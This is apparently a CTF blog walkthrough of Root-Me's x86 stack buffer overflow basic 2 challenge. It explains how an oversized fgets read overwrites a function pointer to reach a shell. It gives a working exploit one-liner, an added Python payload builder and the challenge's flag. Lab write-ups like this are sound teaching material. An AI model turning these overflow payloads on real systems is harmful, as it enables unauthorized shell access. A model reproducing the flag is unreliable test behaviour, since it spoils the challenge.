Tuesday, March 8, 2022

ELF x86 - Stack buffer overflow basic 2 | Pwn Challenge Documentation #3

Back again with another walkthrough from Root-Me Hacking & Information Security Platform. Straight into it. We're provided with the challenge source code as well as the binary protections.

Among the binary protections, NX is enabled, which immediately tells us that any code we place on the stack won't be executed, so classic stack shellcode is off the table. The source code is provided, so we can analyze it.

The source code of the challenge shows 3 functions within the binary. The main function, the entry point of a C program, declares an integer variable called 'var', a function pointer pointing to the function 'sup' and, interestingly, a character buffer of 128 bytes. From that alone, we can see that this is a classic buffer overflow challenge. The next line introduces the fgets call, which reads up to 133 bytes in total (the size argument passed to it) from standard input (stdin) into the buf variable, more than the 128-byte buffer can hold.

Running the binary executes only the main function. We see from the source that there is a shell function which gives us a shell (/bin/bash) so that we can read the flag. The goal is to use the buffer overflow to overwrite the function pointer that sits just past buf on the stack with the memory address of the shell function, redirecting execution into it when main calls through that pointer and giving us a shell.

Note: The memory address of the shell function can be found by loading the binary into GDB and typing 'p shell', which prints the function's address.

I copied the source code and compiled the binary on my local machine, but alternatively Root-Me provides the SSH credentials for the remote server, which you can connect to and complete the challenge on.

To exploit this binary and get a shell, we can use the python available on the remote server to write 128 bytes of junk followed by the address of the shell function in memory, then pipe that output into the binary. The 'cat' at the end keeps stdin open after the shell spawns, so our commands reach the shell instead of it exiting on end-of-file.

Exploit Code: (python -c 'print "A"*128 + "\x16\x85\x04\x08"';cat) | ./ch15
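To show why the one-liner has exactly this shape, here is an added Python 3 example (not from the post and not Root-Me's code) that builds the same 132-byte payload from the numbers given above and refuses inputs that cannot work. It assumes the 128-byte buffer, the fgets size of 133, the shell() address quoted in the exploit, and that the function pointer sits directly after buf on the stack, as the exploit implies.

```python
import struct
import sys

# Values taken from the post's description of the challenge source and exploit.
BUF_SIZE = 128            # char buf[128] in main()
FGETS_N = 133             # fgets(buf, 133, stdin)
SHELL_ADDR = 0x08048516   # address of shell(); "\x16\x85\x04\x08" in the post's payload


def controllable_overflow(buf_size: int, fgets_n: int) -> int:
    """Bytes past the end of buf that the input can fill.

    fgets(buf, n, stdin) stores at most n-1 input characters and then a NUL,
    so (n-1) minus the buffer size is what the input actually controls.
    The challenge's 133 vs 128 leaves exactly 4 bytes: one 32-bit pointer.
    """
    return max(0, (fgets_n - 1) - buf_size)


def build_payload(target: int, buf_size: int = BUF_SIZE, fgets_n: int = FGETS_N) -> bytes:
    """Padding that fills buf, followed by the little-endian address that lands
    on the 4 bytes directly after it (the function pointer main() later calls).
    Raises ValueError when the payload cannot reach or survive the read."""
    addr = struct.pack("<I", target)            # x86: little-endian, 4-byte pointers
    room = controllable_overflow(buf_size, fgets_n)
    if room < len(addr):
        raise ValueError(f"fgets limit leaves only {room} controllable bytes past buf")
    if b"\n" in addr:
        # fgets stops at the first newline, so 0x0a inside the address would truncate it
        raise ValueError("target address contains 0x0a; fgets would stop reading early")
    return b"A" * buf_size + addr


if __name__ == "__main__":
    # Same output as the post's python -c one-liner, written for Python 3 (bytes, not str).
    sys.stdout.buffer.write(build_payload(SHELL_ADDR) + b"\n")
```

The same arithmetic explains the fix: calling fgets(buf, sizeof(buf), stdin) makes controllable_overflow() zero, so nothing past buf can be reached.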

Flag: B33r1sSoG00D4y0urBr4iN
